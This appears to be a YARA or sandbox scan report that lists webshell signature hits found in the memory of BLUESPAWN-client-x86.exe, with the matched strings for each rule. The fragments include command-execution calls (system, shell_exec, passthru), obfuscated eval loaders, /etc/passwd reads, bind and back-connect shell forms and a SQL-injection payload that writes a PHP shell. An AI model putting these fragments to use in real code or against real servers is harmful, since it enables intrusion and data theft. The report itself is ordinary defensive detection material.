- 0x35b134:$s0: form method=post><input type=hidden name=""#"" value=Execute(Session(""#""))><input name=thePath value="""&HtmlEncode(Server.MapPath("."))&
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_Cloaked_Webshell_SuperFetchExec | Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC | Florian Roth | - 0x303f17:$s0: else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);
- 0x35b295:$s0: else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_RemExp_asp_php | PHP Webshells Github Archive - file RemExp.asp.php.txt | Florian Roth | - 0x30408d:$s0: lsExt = Right(FileName, Len(FileName) - liCount)
- 0x2f4936:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x3040ca:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x31904d:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x34fe02:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x35b3d0:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x36a8d0:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x304122:$s13: Response.Write Drive.ShareName & " [share]"
- 0x30415a:$s19: If Request.QueryString("CopyFile") <> "" Then
- 0x304194:$s20: <td width="40%" height="20" bgcolor="silver"> Name</td>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_dC3_Security_Crew_Shell_PRiV | PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php | Florian Roth | - 0x304325:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x30b63c:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x30436a:$s4: $ps=str_replace("\\","/",getenv('DOCUMENT_ROOT'));
- 0x3043a9:$s5: header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
- 0x3043eb:$s15: search_file($_POST['search'],urldecode($_POST['dir']));
- 0x30442f:$s16: echo base64_decode($images[$_GET['pic']]);
- 0x304466:$s20: if (isset($_GET['rename_all'])) {
- 0x30b735:$s20: if (isset($_GET['rename_all'])) {
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_simattacker | PHP Webshells Github Archive - file simattacker.php | Florian Roth | - 0x3045be:$s1: $from = rand (71,1020000000)."@"."Attacker.com";
- 0x3045fb:$s4: Turkish Hackers : WWW.ALTURKS.COM <br>
- 0x304634:$s5: Programer : SimAttacker - Edited By KingDefacer<br>
- 0x30467a:$s6: //fake mail = Use victim server 4 DOS - fake mail
- 0x305a8f:$s6: //fake mail = Use victim server 4 DOS - fake mail
- 0x3046b9:$s10: e-mail : kingdefacer@msn.com<br>
- 0x3046ec:$s17: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x305b1d:$s17: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x304728:$s18: echo "<font size='1' color='#999999'>Dont in windows";
- 0x305b59:$s18: echo "<font size='1' color='#999999'>Dont in windows";
- 0x30476b:$s20: $Comments=$_POST['Comments'];
- 0x305b9c:$s20: $Comments=$_POST['Comments'];
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_DTool_Pro | PHP Webshells Github Archive - file DTool Pro.php | Florian Roth | - 0x3048bb:$s1: function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pront
- 0x35b9eb:$s1: function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pront
- 0x304917:$s2: <font size=3>by r3v3ng4ns - revengans@gmail.com </font>
- 0x30495b:$s3: function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDig
- 0x35ba77:$s3: function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDig
- 0x3049b6:$s11: //Turns the 'ls' command more usefull, showing it as it looks in the shell
- 0x304a0d:$s13: if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
- 0x304a64:$s14: //To keep the changes in the url, when using the 'GET' way to send php variables
- 0x304ac1:$s16: function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite
- 0x35bbb9:$s16: function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite
- 0x304b1c:$s18: if(empty($fu)) $fu = @$_GET['fu'];
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_ironshell | PHP Webshells Github Archive - file ironshell.php | Florian Roth | - 0x304c71:$s0: <title>'.getenv("HTTP_HOST").' ~ Shell I</title>
- 0x304cae:$s2: $link = mysql_connect($_POST['host'], $_POST['username'], $_POST
- 0x35bd25:$s2: $link = mysql_connect($_POST['host'], $_POST['username'], $_POST
- 0x304cfb:$s4: error_reporting(0); //If there is an error, we'll show it, k?
- 0x304d45:$s8: print "<form action=\"".$me."?p=chmod&file=".$content."&d
- 0x35bda8:$s8: print "<form action=\"".$me."?p=chmod&file=".$content."&d
- 0x304d8b:$s15: if(!is_numeric($_POST['timelimit']))
- 0x304dbc:$s16: if($_POST['chars'] == "9999")
- 0x304de6:$s17: <option value=\"az\">a - zzzzz</option>
- 0x304e1a:$s18: print shell_exec($command);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_indexer_asp_php | PHP Webshells Github Archive - file indexer.asp.php.txt | Florian Roth | - 0x304f74:$s0: <meta http-equiv="Content-Language" content="tr">
- 0x304fb2:$s1: <title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>
- 0x304ff5:$s2: <form action="?Gonder" method="post">
- 0x305027:$s4: <form action="?oku" method="post">
- 0x305056:$s7: var message="SaNaLTeRoR -
- 0x30507d:$s8: nDexEr - Reader"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_toolaspshell | PHP Webshells Github Archive - file toolaspshell.php | Florian Roth | - 0x3051c6:$s0: cprthtml = "<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef
- 0x35c0f7:$s0: cprthtml = "<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef
- 0x305222:$s12: barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
- 0x30526a:$s20: destino3 = folderItem.path & "\index.asp"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_b374k_mini_shell_php_php | PHP Webshells Github Archive - file b374k-mini-shell-php.php.php | Florian Roth | - 0x3053e4:$s0: @error_reporting(0);
- 0x305405:$s2: @eval(gzinflate(base64_decode($code)));
- 0x305439:$s3: @set_time_limit(0);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Sincap_1_0 | PHP Webshells Github Archive - file Sincap 1.0.php | Florian Roth | - 0x305582:$s4: </font></span><a href="mailto:shopen@aventgrup.net">
- 0x3055c3:$s5: <title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B
- 0x305609:$s9: </span>Avrasya Veri ve NetWork Teknolojileri Geli
- 0x305647:$s12: while (($ekinci=readdir ($sedat))){
- 0x305677:$s19: $deger2= "$ich[$tampon4]";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_b374k_php | PHP Webshells Github Archive - file b374k.php.php | Florian Roth | - 0x3057c4:$s0: // encrypt your password to md5 here http://kerinci.net/?x=decode
- 0x305812:$s6: // password (default is: b374k)
- 0x35c5a3:$s6: // password (default is: b374k)
- 0x30583e:$s8: //******************************************************************************
- 0x35c5c5:$s8: //******************************************************************************
- 0x30589b:$s9: // b374k 2.2
- 0x3058b4:$s10: eval("?>".gzinflate(base64_decode(
- 0x35c628:$s10: eval("?>".gzinflate(base64_decode(
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend | PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php | Florian Roth | - 0x305a53:$s4: Iranian Hackers : WWW.SIMORGH-EV.COM <br>
- 0x30467a:$s5: //fake mail = Use victim server 4 DOS - fake mail
- 0x305a8f:$s5: //fake mail = Use victim server 4 DOS - fake mail
- 0x305ace:$s10: <a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
- 0x3046ec:$s16: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x305b1d:$s16: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x304728:$s17: echo "<font size='1' color='#999999'>Dont in windows";
- 0x305b59:$s17: echo "<font size='1' color='#999999'>Dont in windows";
- 0x30476b:$s19: $Comments=$_POST['Comments'];
- 0x305b9c:$s19: $Comments=$_POST['Comments'];
- 0x305bc6:$s20: Victim Mail :<br><input type='text' name='to' ><br>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_h4ntu_shell__powered_by_tsoi_ | PHP Webshells Github Archive - file h4ntu shell [powered by tsoi | unknown | - 0x305d54:$s11: <title>h4ntu shell [powered by tsoi]</title>
- 0x305d8d:$s13: $cmd = $_POST['cmd'];
- 0x3062e5:$s13: $cmd = $_POST['cmd'];
- 0x305daf:$s16: $uname = posix_uname( );
- 0x2f3658:$s17: if(!$whoami)$whoami=exec("whoami");
- 0x305dd4:$s17: if(!$whoami)$whoami=exec("whoami");
- 0x305e04:$s18: echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>
- 0x35ca42:$s18: echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>
- 0x305e60:$s20: ob_end_clean();
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_MyShell | PHP Webshells Github Archive - file MyShell.php | Florian Roth | - 0x305fac:$s3: <title>MyShell error - Access Denied</title>
- 0x305fe5:$s4: $adminEmail = "youremail@yourserver.com";
- 0x30601b:$s5: //A workdir has been asked for - we chdir to that dir.
- 0x30605e:$s6: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x30da97:$s6: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x35cc07:$s6: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x3628a0:$s6: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x3060b6:$s13: #$autoErrorTrap Enable automatic error traping if command returns error.
- 0x30610b:$s14: /* No work_dir - we chdir to $DOCUMENT_ROOT */
- 0x306146:$s19: #every command you excecute.
- 0x30616f:$s20: <form name="shell" method="post">
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_pws | PHP Webshells Github Archive - file pws.php | Florian Roth | - 0x3062c5:$s6: if ($_POST['cmd']){
- 0x305d8d:$s7: $cmd = $_POST['cmd'];
- 0x3062e5:$s7: $cmd = $_POST['cmd'];
- 0x306307:$s10: echo "FILE UPLOADED TO $dez";
- 0x306331:$s11: if (file_exists($uploaded)) {
- 0x30635b:$s12: copy($uploaded, $dez);
- 0x30637e:$s17: passthru($cmd);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_reader_asp_php | PHP Webshells Github Archive - file reader.asp.php.txt | Florian Roth | - 0x3064ca:$s5: ster" name=submit> </Font> <a href=mailto:mailbomb@hotmail
- 0x35cf45:$s5: ster" name=submit> </Font> <a href=mailto:mailbomb@hotmail
- 0x306526:$s12: HACKING
- 0x30653c:$s16: FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT:
- 0x35cfa5:$s16: FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT:
- 0x306599:$s20: PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG
- 0x35cff9:$s20: PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 | PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php | Florian Roth | - 0x30675a:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x30918e:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x30679b:$s6: by PHP Emperor<xb5@hotmail.com>
- 0x30922d:$s6: by PHP Emperor<xb5@hotmail.com>
- 0x3067c7:$s9: ".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.
- 0x35d1a5:$s9: ".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.
- 0x306822:$s11: die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
- 0x30685d:$s15: if(empty($_GET['file'])){
- 0x306883:$s16: echo "<head><title>Safe Mode Shell</title></head>";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x306a4e:$s4: $liz0zim=shell_exec($_POST[liz0]);
- 0x306a7e:$s6: $liz0=shell_exec($_POST[baba]);
- 0x306aab:$s9: echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E
- 0x35d3ec:$s9: echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E
- 0x306b07:$s12: :=) :</font><select size="1" name="liz0">
- 0x2ddc66:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
- 0x306b3e:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_backdoor | PHP Webshells Github Archive - file php-backdoor.php | Florian Roth | - 0x306cab:$s5: http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
- 0x306cf3:$s6: // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi
- 0x35d5aa:$s6: // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi
- 0x306d50:$s11: if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
- 0x306d98:$s13: else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
- 0x2e18c2:$s15: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x306de2:$s15: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x342ff3:$s15: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x35d67e:$s15: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Worse_Linux_Shell | PHP Webshells Github Archive - file Worse Linux Shell.php | Florian Roth | - 0x306f73:$s4: if( $_POST['_act'] == "Upload!" ) {
- 0x306fa3:$s5: print "<center><h1>#worst @dal.net</h1></center>";
- 0x306fe2:$s7: print "<center><h1>Linux Shells</h1></center>";
- 0x30701e:$s8: $currentCMD = "ls -la";
- 0x307042:$s14: print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
- 0x30708c:$s19: $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_pHpINJ | PHP Webshells Github Archive - file pHpINJ.php | Florian Roth | - 0x3071fd:$s3: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x31cc1c:$s3: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x307248:$s10: <form action = "<?php echo "$_SERVER[PHP_SELF]" ; ?>" method = "post">
- 0x30729b:$s11: $sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN
- 0x35da19:$s11: $sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN
- 0x3072f6:$s13: Full server path to a writable file which will contain the Php Shell <br />
- 0x30734e:$s14: $expurl= $url."?id=".$sql ;
- 0x307376:$s15: <header>|| .::News PHP Shell Injection::. ||</header> <br /> <br />
- 0x3073ca:$s16: <input type = "submit" value = "Create Exploit"> <br /> <br />
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_NGH | PHP Webshells Github Archive - file NGH.php | Florian Roth | - 0x30753d:$s0: <title>Webcommander at <?=$_SERVER["HTTP_HOST"]?></title>
- 0x307583:$s2: /* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */
- 0x2f40a7:$s5: <form action=<?=$script?>?act=bindshell method=POST>
- 0x3075c9:$s5: <form action=<?=$script?>?act=bindshell method=POST>
- 0x30760a:$s9: <form action=<?=$script?>?act=backconnect method=POST>
- 0x30764d:$s11: <form action=<?=$script?>?act=mkdir method=POST>
- 0x30768a:$s16: die("<font color=#DF0000>Login error</font>");
- 0x3076c5:$s20: <b>Bind /bin/bash at port: </b><input type=text name=port size=8>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_matamu | PHP Webshells Github Archive - file matamu.php | Florian Roth | - 0x307841:$s2: $command .= ' -F';
- 0x307860:$s3: /* We try and match a cd command. */
- 0x307891:$s4: directory... Trust me - it works :-) */
- 0x30bfc3:$s4: directory... Trust me - it works :-) */
- 0x3078c5:$s5: $command .= " 1> $tmpfile 2>&1; " .
- 0x3078f5:$s10: $new_dir = $regs[1]; // 'cd /something/...'
- 0x30792d:$s16: /* The last / in work_dir were the first charecter.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_ru24_post_sh | PHP Webshells Github Archive - file ru24_post_sh.php | Florian Roth | - 0x307a99:$s1: http://www.ru24-team.net
- 0x2fc246:$s4: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x307abe:$s4: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x355988:$s4: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x35e05b:$s4: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x2fc20d:$s6: Ru24PostWebShell
- 0x307b18:$s6: Ru24PostWebShell
- 0x355959:$s6: Ru24PostWebShell
- 0x35e0ab:$s6: Ru24PostWebShell
- 0x2fc2a0:$s7: Writed by DreAmeRz
- 0x307b35:$s7: Writed by DreAmeRz
- 0x307b54:$s9: $function=passthru; // system, exec, cmd
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_hiddens_shell_v1 | PHP Webshells Github Archive - file hiddens shell v1.php | Florian Roth | - 0x2f9586:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x307cbd:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x3537a2:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x35e1ce:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_c99_madnet | PHP Webshells Github Archive - file c99_madnet.php | Florian Roth | - 0x307e42:$s0: $md5_pass = ""; //If no pass then hash
- 0x309c3d:$s0: $md5_pass = ""; //If no pass then hash
- 0x2e121b:$s1: eval(gzinflate(base64_decode('
- 0x2e263d:$s1: eval(gzinflate(base64_decode('
- 0x2f3b7b:$s1: eval(gzinflate(base64_decode('
- 0x2f54c3:$s1: eval(gzinflate(base64_decode('
- 0x307e75:$s1: eval(gzinflate(base64_decode('
- 0x309c70:$s1: eval(gzinflate(base64_decode('
- 0x342b7a:$s1: eval(gzinflate(base64_decode('
- 0x343912:$s1: eval(gzinflate(base64_decode('
- 0x34f3cd:$s1: eval(gzinflate(base64_decode('
- 0x3506b7:$s1: eval(gzinflate(base64_decode('
- 0x35e30e:$s1: eval(gzinflate(base64_decode('
- 0x35f97f:$s1: eval(gzinflate(base64_decode('
- 0x307ea0:$s2: $pass = "pass"; //Pass
- 0x307ec4:$s3: $login = "user"; //Login
- 0x307ee9:$s4: //Authentication
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_c99_locus7s | PHP Webshells Github Archive - file c99_locus7s.php | Florian Roth | - 0x30803d:$s8: $encoded = base64_encode(file_get_contents($d.$f));
- 0x30807e:$s9: $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y
- 0x35e481:$s9: $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y
- 0x3080d0:$s10: else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sq
- 0x35e4ca:$s10: else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sq
- 0x308122:$s11: $c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server
- 0x30816b:$s19: $nixpwdperpage = 100; // Get first N lines from /etc/passwd
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_JspWebshell_1_2 | PHP Webshells Github Archive - file JspWebshell_1.2.php | Florian Roth | - 0x3082e6:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x30c63d:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x30832d:$s1: String password=request.getParameter("password");
- 0x30836b:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x30c684:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x35e6d1:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x361976:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x3083c3:$s7: String editfile=request.getParameter("editfile");
- 0x308401:$s8: //String tempfilename=request.getParameter("file");
- 0x2ea427:$s12: password = (String)session.getAttribute("password");
- 0x308441:$s12: password = (String)session.getAttribute("password");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_safe0ver | PHP Webshells Github Archive - file safe0ver.php | Florian Roth | - 0x3085a6:$s3: $scriptident = "$scriptTitle By Evilc0der.com";
- 0x3085e2:$s4: while (file_exists("$lastdir/newfile$i.txt"))
- 0x30861c:$s5: else { /* Then it must be a File... --> */
- 0x308658:$s7: $contents .= htmlentities( $line ) ;
- 0x308689:$s8: <br><p><br>Safe Mode ByPAss<p><form method="POST">
- 0x3086c8:$s14: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x30fdfa:$s14: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x308711:$s20: /* End of Actions --> */
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Uploader | PHP Webshells Github Archive - file Uploader.php | Florian Roth | - 0x2f57d2:$s1: move_uploaded_file($userfile, "entrika.php");
- 0x30885f:$s1: move_uploaded_file($userfile, "entrika.php");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_kral | PHP Webshells Github Archive - file kral.php | Florian Roth | - 0x3089c4:$s1: $adres=gethostbyname($ip);
- 0x3089eb:$s3: curl_setopt($ch,CURLOPT_POSTFIELDS,"domain=".$site);
- 0x308a2c:$s4: $ekle="/index.php?option=com_user&view=reset&layout=confirm";
- 0x308a76:$s16: echo $son.' <br> <font color="green">Access</font><br>';
- 0x308abb:$s17: <p>kodlama by <a href="mailto:priv8coder@gmail.com">BLaSTER</a><br /
- 0x35ec5a:$s17: <p>kodlama by <a href="mailto:priv8coder@gmail.com">BLaSTER</a><br /
- 0x308b0c:$s20: <p><strong>Server listeleyici</strong><br />
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_cgitelnet | PHP Webshells Github Archive - file cgitelnet.php | Florian Roth | - 0x308c6b:$s9: # Author Homepage: http://www.rohitab.com/
- 0x308ca2:$s10: elsif($Action eq "command") # user wants to run a command
- 0x308ce8:$s18: # in a command line on Windows NT.
- 0x308d17:$s20: print "Transfered $TargetFileSize Bytes.<br>";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_simple_backdoor | PHP Webshells Github Archive - file simple-backdoor.php | Florian Roth | - 0x2f734e:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x308e84:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x3097c9:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x308ecb:$s1: http://michaeldaw.org 2006 -->
- 0x309810:$s1: http://michaeldaw.org 2006 -->
- 0x2f7395:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x308f03:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x309848:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x308f50:$s3: echo "</pre>";
- 0x308f73:$s4: $cmd = ($_REQUEST['cmd']);
- 0x308fa2:$s5: echo "<pre>";
- 0x2dec71:$s6: if(isset($_REQUEST['cmd'])){
- 0x308fc4:$s6: if(isset($_REQUEST['cmd'])){
- 0x309895:$s6: if(isset($_REQUEST['cmd'])){
- 0x308fed:$s7: die;
- 0x309006:$s8: system($cmd);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_2 | PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php | Florian Roth | - 0x30675a:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x30918e:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x3091cf:$s3: xb5@hotmail.com</FONT></CENTER></B>");
- 0x309202:$s4: $v = @ini_get("open_basedir");
- 0x30679b:$s6: by PHP Emperor<xb5@hotmail.com>
- 0x30922d:$s6: by PHP Emperor<xb5@hotmail.com>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_NTDaddy_v1_9 | PHP Webshells Github Archive - file NTDaddy v1.9.php | Florian Roth | - 0x309385:$s2: | -obzerve : mr_o@ihateclowns.com |
- 0x3093b9:$s6: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x309e29:$s6: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x3093f2:$s13: <form action=ntdaddy.asp method=post>
- 0x309424:$s17: response.write("<ERROR: THIS IS NOT A TEXT FILE>")
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_lamashell | PHP Webshells Github Archive - file lamashell.php | Florian Roth | - 0x309589:$s0: if(($_POST['exe']) == "Execute") {
- 0x3095b8:$s8: $curcmd = $_POST['king'];
- 0x3095de:$s16: "http://www.w3.org/TR/html4/loose.dtd">
- 0x309612:$s18: <title>lama's'hell v. 3.0</title>
- 0x309640:$s19: _|_ O _ O _|_
- 0x309662:$s20: $curcmd = "ls -lah";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Simple_PHP_backdoor_by_DK | PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php | Florian Roth | - 0x2f734e:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x308e84:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x3097c9:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x308ecb:$s1: http://michaeldaw.org 2006 -->
- 0x309810:$s1: http://michaeldaw.org 2006 -->
- 0x2f7395:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x308f03:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x309848:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x2dec71:$s6: if(isset($_REQUEST['cmd'])){
- 0x308fc4:$s6: if(isset($_REQUEST['cmd'])){
- 0x309895:$s6: if(isset($_REQUEST['cmd'])){
- 0x2dec9a:$s8: system($cmd);
- 0x30900e:$s8: system($cmd);
- 0x3098be:$s8: system($cmd);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Moroccan_Spamers_Ma_EditioN_By_GhOsT | PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php | Florian Roth | - 0x309a34:$s4: $content = chunk_split(base64_encode($content));
- 0x309a72:$s12: print "Sending mail to $to....... ";
- 0x309aa4:$s16: if (!$from && !$subject && !$message && !$emaillist){
|
